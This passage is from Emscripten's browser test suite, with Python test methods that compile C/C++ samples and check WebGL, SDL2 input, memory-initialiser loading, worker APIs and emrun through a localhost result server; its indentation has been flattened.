print('Crunch is located at ' + CRUNCH)
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.js', '-s', 'SIDE_MODULE=1', '-O2']).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.js"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
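    # post.js calls into the module before the memory initializer has arrived; with assertions enabled this is caught (result 9),
    # otherwise the early write is simply overwritten (result 3).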
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
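    # Supply Module.memoryInitializerRequest ourselves: a correct .mem URL should load normally, while a bogus URL should hit the warning path and report failure.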
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
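    # Calls made via ccall/cwrap/direct export before the runtime is ready must abort with an assertion;
    # the same calls made at a valid time (from main, or while the runtime is still alive) must succeed.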
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
Module.print('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
Module.print('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
Module.print('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
Module.print('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
def test_module(self):
return self.skip('non-fastcomp is deprecated and fails in 3.5')
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser(): return self.skip('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser(): return self.skip('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the launched browser uses that directory as its startup directory.
    # The browser does not close as part of the test, which on Windows would pin down the cwd and prevent it from being deleted.
    # Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
      # If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun, so strip them out.
browser_name = shlex.split(browser)[0]
args += ['--browser', browser_name]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
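    # Adding and immediately removing a run dependency in preRun must not cause the runtime to start (and main to run) twice.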
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
  # Verify the fix for https://github.com/kripken/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
def test_webgl_context_params(self):
if WINDOWS: return self.skip('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = '-O' + str(opt_level)
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
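  # Test emscripten_wget(); it needs to suspend execution, so run with ASYNCIFY and/or the emterpreter.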
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
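  # Test Module.locateFile (via a pre-js and via the shell HTML) for loading the .mem file and packaged data from a subdirectory.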
def test_locate_file(self):
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
os.mkdir('sub')
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1'] + args).communicate()
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
def test_glfw3(self):
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'], expected='1')
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
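  # Test SWAPPABLE_ASM_MODULE: build a second module, swap it in at runtime, and verify the swapped-in code is used.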
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
